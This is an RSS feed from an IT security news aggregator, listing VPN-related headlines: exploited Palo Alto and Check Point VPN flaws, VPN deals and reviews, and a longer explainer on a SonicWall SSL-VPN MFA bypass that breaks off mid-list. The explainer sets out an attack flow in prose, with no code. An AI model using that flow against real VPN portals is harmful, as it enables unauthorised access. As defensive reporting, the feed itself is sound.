<?xml version="1.0" encoding="UTF-8" ?> 
<rss version="2.0" xmlns:atom="https://www.w3.org/2005/Atom"> 
<channel> 
<title><![CDATA[Team IT Security - 📰 IT Security Nachrichten]]></title> 
<link><![CDATA[https://tsecurity.de/feed.php?typ=1&q=VPN]]></link> 
<description><![CDATA[Die Bedeutung von IT-Sicherheit in der digitalen Landschaft]]></description>
<copyright>2026</copyright>
<atom:link href="https://tsecurity.de/feed.php?typ=1&amp;q=VPN" rel="self" type="application/rss+xml" />
<item> 
<title><![CDATA[Palo Alto Warns of GlobalProtect VPN Vulnerability Actively Exploited in the Wild]]></title> 
<description><![CDATA[Palo Alto Networks Unit 42 has issued an urgent warning about active exploitation of CVE-2026-0257, a critical authentication bypass vulnerability affecting the GlobalProtect portal and gateway components of PAN-OS software. The flaw allows unauthenticated remote attackers to circumvent security controls&hellip;
Read more &rarr;
The post Palo Alto Warns of GlobalProtect VPN Vulnerability Actively Exploited in the Wild appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3598560/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+GlobalProtect+VPN+Vulnerability+Actively+Exploited+in+the+Wild/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598560/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+GlobalProtect+VPN+Vulnerability+Actively+Exploited+in+the+Wild/</guid>
<pubDate>Mon, 15 Jun 2026 11:07:13 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto Warns GlobalProtect VPN Flaw Is Being Actively Exploited]]></title> 
<description><![CDATA[Palo Alto Networks has issued an urgent warning after confirming active exploitation of a GlobalProtect VPN vulnerability, tracked as CVE-2026-0257, impacting PAN-OS deployments with specific configurations. The flaw, which affects the GlobalProtect portal and gateway components, enables an authentication bypass&hellip;
Read more &rarr;
The post Palo Alto Warns GlobalProtect VPN Flaw Is Being Actively Exploited appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3598494/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+GlobalProtect+VPN+Flaw+Is+Being+Actively+Exploited/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598494/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+GlobalProtect+VPN+Flaw+Is+Being+Actively+Exploited/</guid>
<pubDate>Mon, 15 Jun 2026 10:31:59 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto Warns GlobalProtect VPN Flaw Is Being Actively Exploited]]></title> 
<description><![CDATA[Palo Alto Networks has issued an urgent warning after confirming active exploitation of a GlobalProtect VPN vulnerability, tracked as CVE-2026-0257, impacting PAN-OS deployments with specific configurations. The flaw, which affects the GlobalProtect portal and gateway components, enables an authentication bypass that allows unauthenticated attackers to establish VPN sessions and potentially gain access to internal enterprise [&hellip;]
The post Palo Alto Warns GlobalProtect VPN Flaw Is Being Actively Exploited appeared first on GBHackers Security | #1 Globally Trusted Cyber Security News Platform. ]]></description>
<link>https://tsecurity.de/de/3598475/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+GlobalProtect+VPN+Flaw+Is+Being+Actively+Exploited/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598475/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+GlobalProtect+VPN+Flaw+Is+Being+Actively+Exploited/</guid>
<pubDate>Mon, 15 Jun 2026 10:09:55 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto Warns of Actively Exploited GlobalProtect VPN Vulnerability]]></title> 
<description><![CDATA[Palo Alto Networks Unit 42 has confirmed active exploitation of&nbsp;CVE-2026-0257, a critical authentication bypass vulnerability affecting the GlobalProtect portal and gateway components of PAN-OS software. The flaw allows remote unauthenticated attackers to forge authentication override cookies and establish unauthorized VPN connections without ever providing valid credentials. The vulnerability was originally assigned a CVSSv4 score of [&hellip;]
The post Palo Alto Warns of Actively Exploited GlobalProtect VPN Vulnerability appeared first on Cyber Security News. ]]></description>
<link>https://tsecurity.de/de/3598472/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+Actively+Exploited+GlobalProtect+VPN+Vulnerability/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598472/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+Actively+Exploited+GlobalProtect+VPN+Vulnerability/</guid>
<pubDate>Mon, 15 Jun 2026 10:19:02 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto Warns of GlobalProtect VPN Vulnerability Actively Exploited in the Wild]]></title> 
<description><![CDATA[Palo Alto Networks Unit 42 has issued an urgent warning about active exploitation of CVE-2026-0257, a critical authentication bypass vulnerability affecting the GlobalProtect portal and gateway components of PAN-OS software. The flaw allows unauthenticated remote attackers to circumvent security controls and initiate unauthorized VPN connections without requiring any credentials. The U.S. Cybersecurity and Infrastructure Security [&hellip;]
The post Palo Alto Warns of GlobalProtect VPN Vulnerability Actively Exploited in the Wild appeared first on Cyber Security News. ]]></description>
<link>https://tsecurity.de/de/3598421/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+GlobalProtect+VPN+Vulnerability+Actively+Exploited+in+the+Wild/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598421/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+GlobalProtect+VPN+Vulnerability+Actively+Exploited+in+the+Wild/</guid>
<pubDate>Mon, 15 Jun 2026 09:43:04 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw]]></title> 
<description><![CDATA[Palo Alto Networks has revealed that it has observed &ldquo;active exploitation&rdquo; of a recently disclosed PAN-OS vulnerability by an unknown threat actor to obtain unauthorized access to GlobalProtect portals. The vulnerability in question is CVE-2026-0257 (CVSS score: 7.8), an authentication&hellip;
Read more &rarr;
The post Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3598372/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+Active+Exploitation+of+PAN-OS+GlobalProtect+VPN+Flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598372/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+Active+Exploitation+of+PAN-OS+GlobalProtect+VPN+Flaw/</guid>
<pubDate>Mon, 15 Jun 2026 09:34:24 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Palo Alto Warns of Active Exploitation of PAN-OS GlobalProtect VPN Flaw]]></title> 
<description><![CDATA[Palo Alto Networks has revealed that it has observed &quot;active exploitation&quot; of a recently disclosed PAN-OS vulnerability by an unknown threat actor to obtain unauthorized access to GlobalProtect portals.

The vulnerability in question is CVE-2026-0257 (CVSS score: 7.8), an authentication bypass flaw affecting the portal and gateway components of PAN-OS software that could be exploited by bad ]]></description>
<link>https://tsecurity.de/de/3598338/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+Active+Exploitation+of+PAN-OS+GlobalProtect+VPN+Flaw/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3598338/IT+Sicherheit/Cybersecurity+Nachrichten/Palo+Alto+Warns+of+Active+Exploitation+of+PAN-OS+GlobalProtect+VPN+Flaw/</guid>
<pubDate>Mon, 15 Jun 2026 08:17:32 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Montag: Intel vor erneuter CPU-Neuauflage, Firefox mit unbegrenztem Browser-VPN]]></title> 
<description><![CDATA[&bdquo;Raptor Lake Next&ldquo; wegen DDR4 + Firefox-VPN tempor&auml;r ohne Datenlimit + USA gegen Anthropics KI-Modelle + Amazon als KI-Petze + Schweizer Palantir-Niederlage ]]></description>
<link>https://tsecurity.de/de/3597996/IT+Nachrichten/Montag%3A+Intel+vor+erneuter+CPU-Neuauflage%2C+Firefox+mit+unbegrenztem+Browser-VPN/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597996/IT+Nachrichten/Montag%3A+Intel+vor+erneuter+CPU-Neuauflage%2C+Firefox+mit+unbegrenztem+Browser-VPN/</guid>
<pubDate>Mon, 15 Jun 2026 06:15:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Firefox bietet im Sommer kostenloses VPN im Browser ohne Datenlimit]]></title> 
<description><![CDATA[Das im Firefox integrierte VPN besitzt ein Datenvolumen von 50 GByte monatlich. Doch bis Ende August wurde das Limit aufgehoben und weitere L&auml;nder hinzugef&uuml;gt. ]]></description>
<link>https://tsecurity.de/de/3597922/IT+Nachrichten/Firefox+bietet+im+Sommer+kostenloses+VPN+im+Browser+ohne+Datenlimit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597922/IT+Nachrichten/Firefox+bietet+im+Sommer+kostenloses+VPN+im+Browser+ohne+Datenlimit/</guid>
<pubDate>Mon, 15 Jun 2026 05:03:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Is using a VPN legal in the USA, Canada and Mexico? What World Cup travelers need to know]]></title> 
<description><![CDATA[The 2026 World Cup guide to crossing borders with a VPN ]]></description>
<link>https://tsecurity.de/de/3597785/IT+Nachrichten/Is+using+a+VPN+legal+in+the+USA%2C+Canada+and+Mexico%3F+What+World+Cup+travelers+need+to+know/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3597785/IT+Nachrichten/Is+using+a+VPN+legal+in+the+USA%2C+Canada+and+Mexico%3F+What+World+Cup+travelers+need+to+know/</guid>
<pubDate>Mon, 15 Jun 2026 02:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Week in review: Exploited Check Point VPN zero-day, Oracle PeopleSoft servers under attack]]></title> 
<description><![CDATA[Here&rsquo;s an overview of some of last week&rsquo;s most interesting news, articles, interviews and videos: DockSec: Open-source AI-powered Docker security scanner DockSec is an OWASP Incubator Project that combines three container security scanners with a language-model layer for explanation and&hellip;
Read more &rarr;
The post Week in review: Exploited Check Point VPN zero-day, Oracle PeopleSoft servers under attack appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3596774/IT+Sicherheit/Cybersecurity+Nachrichten/Week+in+review%3A+Exploited+Check+Point+VPN+zero-day%2C+Oracle+PeopleSoft+servers+under+attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596774/IT+Sicherheit/Cybersecurity+Nachrichten/Week+in+review%3A+Exploited+Check+Point+VPN+zero-day%2C+Oracle+PeopleSoft+servers+under+attack/</guid>
<pubDate>Sun, 14 Jun 2026 10:34:10 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Week in review: Exploited Check Point VPN zero-day, Oracle PeopleSoft servers under attack]]></title> 
<description><![CDATA[Here&rsquo;s an overview of some of last week&rsquo;s most interesting news, articles, interviews and videos: DockSec: Open-source AI-powered Docker security scanner DockSec is an OWASP Incubator Project that combines three container security scanners with a language-model layer for explanation and remediation. Created by Advait Patel, the Python tool runs Trivy, Hadolint, and Docker Scout against a developer&rsquo;s Dockerfile and image, correlates the findings, returns a 0-100 security score, and proposes line-specific fixes. Treating AI agents &hellip; More &rarr;
The post Week in review: Exploited Check Point VPN zero-day, Oracle PeopleSoft servers under attack appeared first on Help Net Security. ]]></description>
<link>https://tsecurity.de/de/3596729/IT+Sicherheit/Cybersecurity+Nachrichten/Week+in+review%3A+Exploited+Check+Point+VPN+zero-day%2C+Oracle+PeopleSoft+servers+under+attack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596729/IT+Sicherheit/Cybersecurity+Nachrichten/Week+in+review%3A+Exploited+Check+Point+VPN+zero-day%2C+Oracle+PeopleSoft+servers+under+attack/</guid>
<pubDate>Sun, 14 Jun 2026 10:00:50 +0200</pubDate>
</item>
<item> 
<title><![CDATA[BSI warnt vor kritischer Schwachstelle in Check Point VPN-Lösungen - B2B Cyber Security]]></title> 
<description><![CDATA[Das Leitbild: Das BSI als die Cyber-Sicherheitsbeh&ouml;rde des Bundes gestaltet Informationssicherheit in der Digitalisierung durch Pr&auml;vention, Detektion&nbsp;... ]]></description>
<link>https://tsecurity.de/de/3596606/IT+Sicherheit/Cybersecurity+Nachrichten/BSI+warnt+vor+kritischer+Schwachstelle+in+Check+Point+VPN-L%C3%B6sungen+-+B2B+Cyber+Security/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3596606/IT+Sicherheit/Cybersecurity+Nachrichten/BSI+warnt+vor+kritischer+Schwachstelle+in+Check+Point+VPN-L%C3%B6sungen+-+B2B+Cyber+Security/</guid>
<pubDate>Sun, 14 Jun 2026 07:51:20 +0200</pubDate>
</item>
<item> 
<title><![CDATA[How to use a VPN on your smart TV during the World Cup]]></title> 
<description><![CDATA[Many modern TVs have the ability to run a VPN without an external device &ndash; here are the best picks for Android TVs, Google TVs, and Amazon Fire TVs ]]></description>
<link>https://tsecurity.de/de/3595787/IT+Nachrichten/How+to+use+a+VPN+on+your+smart+TV+during+the+World+Cup/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595787/IT+Nachrichten/How+to+use+a+VPN+on+your+smart+TV+during+the+World+Cup/</guid>
<pubDate>Sat, 13 Jun 2026 17:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Best VPN for School Wi-Fi in 2026: Unblock Streaming Services and Bypass Censorship Restrictions]]></title> 
<description><![CDATA[A VPN can help you bypass your school&rsquo;s firewall if it&#039;s limiting the educational resources available to you online. ]]></description>
<link>https://tsecurity.de/de/3595582/IT+Nachrichten/Best+VPN+for+School+Wi-Fi+in+2026%3A+Unblock+Streaming+Services+and+Bypass+Censorship+Restrictions/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595582/IT+Nachrichten/Best+VPN+for+School+Wi-Fi+in+2026%3A+Unblock+Streaming+Services+and+Bypass+Censorship+Restrictions/</guid>
<pubDate>Sat, 13 Jun 2026 14:00:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[CVE-2022-34821 | Siemens SIMATIC CP 1242-7 V2 OpenVPN Configuration code injection (ssa-517377 / EUVD-2022-37727)]]></title> 
<description><![CDATA[A vulnerability categorized as critical has been discovered in Siemens SIMATIC CP 1242-7 V2, SIMATIC CP 1243-1, SIMATIC CP 1243-7 LTE EU, SIMATIC CP 1243-7 LTE US, SIMATIC CP 1243-8 IRC, SIMATIC CP 1542SP-1 IRC, SIMATIC CP 1543-1, SIMATIC CP 1543SP-1, SIPLUS ET 200SP CP 1542SP-1 IRC TX RAIL, SIPLUS ET 200SP CP 1543SP-1 ISEC, SIPLUS ET 200SP CP 1543SP-1 ISEC TX RAIL, SIPLUS NET CP 1242-7 V2, SIPLUS NET CP 1543-1, SIPLUS S7-1200 CP 1243-1 and SIPLUS S7-1200 CP 1243-1 RAIL. Affected by this vulnerability is an unknown functionality of the component OpenVPN Configuration Handler. The manipulation results in code injection.

This vulnerability is known as CVE-2022-34821. Access to the local network is required for this attack. No exploit is available.

It is advisable to upgrade the affected component. ]]></description>
<link>https://tsecurity.de/de/3595299/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2022-34821+%7C+Siemens+SIMATIC+CP+1242-7+V2+OpenVPN+Configuration+code+injection+%28ssa-517377+%2F+EUVD-2022-37727%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3595299/IT+Reverse+Engineering/Sicherheitsl%C3%BCcken/CVE-2022-34821+%7C+Siemens+SIMATIC+CP+1242-7+V2+OpenVPN+Configuration+code+injection+%28ssa-517377+%2F+EUVD-2022-37727%29/</guid>
<pubDate>Sat, 13 Jun 2026 10:42:59 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Die besten Gratis-VPNs für Windows]]></title> 
<description><![CDATA[

					  
						




Kostenlose VPN-L&ouml;sungen haben ihre T&uuml;cken. Wir zeigen Ihnen die drei besten Gratis-Tools f&uuml;r Windows-Systeme.
					Foto: monkographic &ndash; shutterstock.com




Kostenlose Virtual Private Networks (VPNs) sind eine heikle Angelegenheit &ndash; schlie&szlig;lich steht dabei immer die Frage im Raum, wie das jeweilige Anbieterunternehmen die Kosten f&uuml;r ein solches Angebot deckt. Einige sehen kostenlose Testversionen als Gelegenheit, Upgrades zu empfehlen oder einfach als Werbema&szlig;nahme f&uuml;r ihre kostenpflichtigen Services. Andere wiederum hosten Werbung von Drittanbietern oder sammeln Informationen &ndash; etwa zu besuchten Webseiten &ndash; im Namen von Big Data und &ldquo;allgemeinen Optimierungsma&szlig;nahmen&rdquo;.



Wenn Sie ein Virtual Private Network langfristig nutzen wollen, sollten Sie eine kostenpflichtige L&ouml;sung in Erw&auml;gung ziehen &ndash; diese bieten mehr Server-Standorte, gleichzeitige Verbindungen und manchmal auch bessere Geschwindigkeiten. Die Restriktionen bei kostenlosen VPN-L&ouml;sungen variieren je nach Dienstanbieter &ndash; sicher ist nur, dass es bei Gratis-Angeboten immer irgendwelche Einschr&auml;nkungen gibt. Nichtsdestotrotz sind Gratis-VPNs gut f&uuml;r den kurzfristigen Einsatz geeignet &ndash; oder um Dienste eine Zeit lang zu testen. 



Kostenlose VPNs f&uuml;r Windows: Top 3



Im Folgenden haben wir die unserer Meinung nach drei besten, kostenlosen VPN-Tools f&uuml;r Windows-PCs zusammengestellt.



ProtonVPN



Die kostenlose Version von ProtonVPN f&uuml;r Windows erlaubt nur eine Ger&auml;teverbindung pro Benutzer und begrenzt sowohl Server-Lokationen (f&uuml;nf, die zuf&auml;llig gew&auml;hlt werden) als auch Speed f&uuml;r Nutzer des &ldquo;Free&rdquo;-Modells. Das ist jedoch v&ouml;llig ausreichend f&uuml;r normale Surfaktivit&auml;ten oder auch (Low- bis Mid-Quality-)Videostreaming. Allerdings: Wer mit der kostenlosen Version von ProtonVPN Netflix-L&auml;ndergrenzen &ldquo;&uuml;berwinden&rdquo; m&ouml;chte, schaut leider in die R&ouml;hre.



Das App-Design des Schweizer Anbieters &uuml;berzeugt ebenso wie die Performance des Gratis-VPN-Tunnels. Um die kostenlose Version nutzen zu k&ouml;nnen, ist eine Registrierung mit E-Mail-Adresse erforderlich. 



WindScribe



Diese Gratis-VPN-L&ouml;sung bietet mehr Funktionen und weniger Einschr&auml;nkungen als die meisten anderen Angebote dieser Art. Mit einer Ausnahme: Der Traffic ist auf zehn GB pro Monat begrenzt. Wenn Sie also datenintensive Tasks wie Videostreaming im Auge haben, ist das Kontingent vermutlich schnell aufgebraucht.



Diesen Nachteil wiegt WindScribe allerdings damit wieder auf, dass der VPN-Service mit beliebig vielen Devices genutzt werden kann. Zudem stehen zehn verschiedene Server-Standorte zur Wahl. Auch bei WindScribe erfordert die kostenlose Nutzung eine Registrierung mit E-Mail-Adresse.



Hide.me



Eine Art Hybrid aus ProtonVPN und Windscribe bietet Hide.me. Der kostenlose VPN hat keine Traffic-Begrenzung. Allerdings kann das Gratis-Angebot nur mit einem Ger&auml;t genutzt werden. Dabei stehen acht Server-Standorte zur Wahl.



Wenn Sie den kostenlosen Service von Hide.me nutzen m&ouml;chten, m&uuml;ssen Sie sich mit einer E-Mail-Adresse registrieren. (fm)

 ]]></description>
<link>https://tsecurity.de/de/3594941/IT+Sicherheit/Cybersecurity+Nachrichten/Die+besten+Gratis-VPNs+f%C3%BCr+Windows/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594941/IT+Sicherheit/Cybersecurity+Nachrichten/Die+besten+Gratis-VPNs+f%C3%BCr+Windows/</guid>
<pubDate>Sat, 13 Jun 2026 06:04:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[You Can Stream Every FIFA 2026 World Cup Match With a VPN. Here's How]]></title> 
<description><![CDATA[A VPN can help you unlock all 104 FIFA World Cup 2026 matches, potentially even for free. ]]></description>
<link>https://tsecurity.de/de/3594465/IT+Nachrichten/You+Can+Stream+Every+FIFA+2026+World+Cup+Match+With+a+VPN.+Here%27s+How/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594465/IT+Nachrichten/You+Can+Stream+Every+FIFA+2026+World+Cup+Match+With+a+VPN.+Here%27s+How/</guid>
<pubDate>Fri, 12 Jun 2026 20:22:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[WM-Tickets für 2,29 Euro im Monat: ExpressVPN verlost Karten unter neuen Abonennten]]></title> 
<description><![CDATA[ExpressVPN startet eine neue Aktion mit bis zu 80 Prozent Rabatt auf ausgew&auml;hlte Tarife. Zus&auml;tzlich gibt es die Chance auf exklusive Tickets f&uuml;r die Fu&szlig;ballweltmeisterschaft zu erhalten.
																					Dieser Artikel wurde einsortiert unter 
																	Schn&auml;ppchen,																	VPN-Dienste im Vergleich: Mit unserem Testsieger sicher und anonym durchs Internet,																	ExpressVPN,																	VPN: Ratgeber, Test und Vergleiche - Anonym und sicher im Netz. ]]></description>
<link>https://tsecurity.de/de/3594446/IT+Nachrichten/WM-Tickets+f%C3%BCr+2%2C29+Euro+im+Monat%3A+ExpressVPN+verlost+Karten+unter+neuen+Abonennten/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3594446/IT+Nachrichten/WM-Tickets+f%C3%BCr+2%2C29+Euro+im+Monat%3A+ExpressVPN+verlost+Karten+unter+neuen+Abonennten/</guid>
<pubDate>Fri, 12 Jun 2026 20:36:00 +0200</pubDate>
</item>
<item> 
<title><![CDATA[NordVPN’s next-gen antivirus aces independent testing with a 96% phishing block rate]]></title> 
<description><![CDATA[NordVPN&#039;s next-generation antivirus has just blocked 96% of phishing sites in an independent AV-Comparatives test, proving the privacy app is a formidable all-in-one security suite. ]]></description>
<link>https://tsecurity.de/de/3593914/IT+Nachrichten/NordVPN%E2%80%99s+next-gen+antivirus+aces+independent+testing+with+a+96%25+phishing+block+rate/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593914/IT+Nachrichten/NordVPN%E2%80%99s+next-gen+antivirus+aces+independent+testing+with+a+96%25+phishing+block+rate/</guid>
<pubDate>Fri, 12 Jun 2026 17:17:45 +0200</pubDate>
</item>
<item> 
<title><![CDATA['This is an important release' — Amnezia VPN strengthens its apps to fight Russia's new approach to VPN blocking in latest update]]></title> 
<description><![CDATA[&quot;We have no intention of giving in to the difficulties,&quot; said Amnezia&#039;s founder, as the team fixed a bug in its latest update to thwart the newest censorship methods allegedly adopted by Russia&#039;s media regulator Roskomnadzor. ]]></description>
<link>https://tsecurity.de/de/3593805/IT+Nachrichten/%27This+is+an+important+release%27+%E2%80%94+Amnezia+VPN+strengthens+its+apps+to+fight+Russia%27s+new+approach+to+VPN+blocking+in+latest+update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593805/IT+Nachrichten/%27This+is+an+important+release%27+%E2%80%94+Amnezia+VPN+strengthens+its+apps+to+fight+Russia%27s+new+approach+to+VPN+blocking+in+latest+update/</guid>
<pubDate>Fri, 12 Jun 2026 16:47:09 +0200</pubDate>
</item>
<item> 
<title><![CDATA[PureVPN has turned ChatGPT into a VPN assistant that handles the tedious manual tasks for you]]></title> 
<description><![CDATA[PureVPN has launched its integrated ChatGPT-powered assistant, providing a conversational, AI-powered VPN experience. Here&#039;s how. ]]></description>
<link>https://tsecurity.de/de/3593635/IT+Nachrichten/PureVPN+has+turned+ChatGPT+into+a+VPN+assistant+that+handles+the+tedious+manual+tasks+for+you/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593635/IT+Nachrichten/PureVPN+has+turned+ChatGPT+into+a+VPN+assistant+that+handles+the+tedious+manual+tasks+for+you/</guid>
<pubDate>Fri, 12 Jun 2026 15:43:30 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Get ExpressVPN, one of the world’s most popular VPNs, at a new low price]]></title> 
<description><![CDATA[
The ExpressVPN&nbsp;one-year basic plan covers up to 10 devices with fast speeds, ad blocking, MailGuard protection and more.
(via Cult of Mac - Your source for the latest Apple news, rumors, analysis, reviews, how-tos and deals.) ]]></description>
<link>https://tsecurity.de/de/3593599/IT+Betriebssysteme/iOS+%2F+MacOS+Tipps/Get+ExpressVPN%2C+one+of+the+world%E2%80%99s+most+popular+VPNs%2C+at+a+new+low+price/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593599/IT+Betriebssysteme/iOS+%2F+MacOS+Tipps/Get+ExpressVPN%2C+one+of+the+world%E2%80%99s+most+popular+VPNs%2C+at+a+new+low+price/</guid>
<pubDate>Fri, 12 Jun 2026 15:15:55 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Researchers release details, PoC for exploited Check Point VPN flaw (CVE-2026-50751)]]></title> 
<description><![CDATA[WatchTowr researchers have disclosed a technical analysis and a &ldquo;Detection Artefact Generator&rdquo; for CVE-2026-50751, an authentication bypass flaw in Check Point&rsquo;s Remote Access VPN and Mobile Access, which the vendor confirmed to be actively exploited. The attacks were limited, but&hellip;
Read more &rarr;
The post Researchers release details, PoC for exploited Check Point VPN flaw (CVE-2026-50751) appeared first on IT Security News. ]]></description>
<link>https://tsecurity.de/de/3593467/IT+Sicherheit/Cybersecurity+Nachrichten/Researchers+release+details%2C+PoC+for+exploited+Check+Point+VPN+flaw+%28CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593467/IT+Sicherheit/Cybersecurity+Nachrichten/Researchers+release+details%2C+PoC+for+exploited+Check+Point+VPN+flaw+%28CVE-2026-50751%29/</guid>
<pubDate>Fri, 12 Jun 2026 14:32:37 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Researchers release details, PoC for exploited Check Point VPN flaw (CVE-2026-50751)]]></title> 
<description><![CDATA[WatchTowr researchers have disclosed a technical analysis and a &ldquo;Detection Artefact Generator&rdquo; for CVE-2026-50751, an authentication bypass flaw in Check Point&rsquo;s Remote Access VPN and Mobile Access, which the vendor confirmed to be actively exploited. The attacks were limited, but with this information now public, a larger wave of opportunistic attacks may be expected. From silent exploitation to public disclosure CVE-2026-50751 was patched by Check Point on June 8, 2026, and the company said that &hellip; More &rarr;
The post Researchers release details, PoC for exploited Check Point VPN flaw (CVE-2026-50751) appeared first on Help Net Security. ]]></description>
<link>https://tsecurity.de/de/3593426/IT+Sicherheit/Cybersecurity+Nachrichten/Researchers+release+details%2C+PoC+for+exploited+Check+Point+VPN+flaw+%28CVE-2026-50751%29/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3593426/IT+Sicherheit/Cybersecurity+Nachrichten/Researchers+release+details%2C+PoC+for+exploited+Check+Point+VPN+flaw+%28CVE-2026-50751%29/</guid>
<pubDate>Fri, 12 Jun 2026 14:14:40 +0200</pubDate>
</item>
<item> 
<title><![CDATA[Beyond the Patch: Understanding the SonicWall SSL-VPN MFA Bypass Exposure]]></title> 
<description><![CDATA[In May 2026, ransomware-linked attacks associated with CVE-2024&ndash;12802 targeting SonicWall Gen6 SSL-VPN devices regained attention. The vulnerability stems from a structural flaw in how SSL-VPN authentication handles UPN (User Principal Name) and SAM (Security Account Manager) account formats separately. In certain environments, attackers can exploit alternative login formats to bypass MFA even when MFA appears to be&nbsp;enabled.What makes this vulnerability particularly dangerous is that it is not simply a patching issue. SonicWall&rsquo;s official advisory states that Gen6 devices require an additional six-step manual LDAP reconfiguration after firmware updates. However, standard patch management workflows typically verify only firmware versions and do not confirm whether the manual reconfiguration has been completed. As a result, administrators may believe their devices are protected while vulnerable LDAP configurations remain active. Furthermore, MFA bypass attempts in these attacks are logged as seemingly legitimate MFA successes, making detection significantly more difficult for security&nbsp;teams.This article analyzes the technical root cause and attack flow of CVE-2024&ndash;12802 and examines why externally exposed VPN devices can become initial access vectors for ransomware operations.Understanding CVE-2024&ndash;12802: An Overview of the VulnerabilityCategoryDescriptionVulnerability IDCVE-2024&ndash;12802Affected ProductSonicWall SSL-VPNVulnerability TypeMFA Authentication Bypass &mdash; CWE-305(Authentication Bypass by Primary Weakness)CVSS Score9.1 (Critical)Exploitation StatusRansomware-linked attacks observed across multiple environments in Feb&ndash;Mar&nbsp;2026CVE-2024&ndash;12802 occurs due to the way SonicWall SSL-VPN handles different account name formats in Active Directory environments. Users can typically authenticate using&nbsp;either:UPN format (user@domain.com)SAM format (DOMAIN\username)The issue is that MFA policies may be applied separately to each login format rather than to the user identity itself. An administrator may configure MFA enforcement for one login format while leaving another authentication path insufficiently protected. Attackers who obtain valid credentials can then authenticate through the weaker login path without triggering MFA.Analyzing the Root Cause: Separate MFA Validation Paths for UPN and&nbsp;SAMThe UPN (User Principal Name) format resembles an email address such as user@domain.com. The SAM (Security Account Manager) format follows the legacy Windows domain login style: DOMAIN\username. Although both formats reference the same user account, SonicWall processes them as entirely separate authentication paths. MFA is configured independently for each login flow rather than being tied directly to the user identity. If MFA is configured only for the SAM path, the UPN path may remain unprotected, allowing successful authentication with only valid credentials and no second-factor verification.For Gen6 devices, firmware updates patch the vulnerable code but do not modify existing LDAP configurations. If the legacy LDAP configuration using userPrincipalName remains intact, MFA bypass through the UPN path remains possible even after updating. Although SonicWall explicitly documented this behavior in its advisory, standard patch management systems generally verify only firmware versions, not whether manual LDAP reconfiguration was completed.As a&nbsp;result:Devices appear fully&nbsp;updatedVersion checks&nbsp;passMFA appears&nbsp;enabledYet the environment may still remain vulnerable.Mapping the Attack Flow Behind the VulnerabilityA typical attack flow exploiting CVE-2024&ndash;12802 may proceed as&nbsp;follows:Identification of internet-exposed SSL-VPN devicesAttackers scan the internet for accessible SonicWall SSL-VPN portals using login pages, SSL-VPN ports, device banners, and authentication page&nbsp;titles.Credential acquisition and login attemptsAttackers leverage leaked credentials, reused passwords, brute-force attempts, or credentials obtained from prior compromises.Exploitation of MFA bypass pathsAttackers abuse differences in UPN/SAM authentication handling to access login paths where MFA enforcement is incomplete. Logs may still appear to show legitimate MFA activity, delaying detection.Internal network reconnaissanceAfter VPN access is obtained, attackers rapidly enumerate internal IP ranges, file servers, domain-joined systems, and remotely accessible servers.Credential reuse and 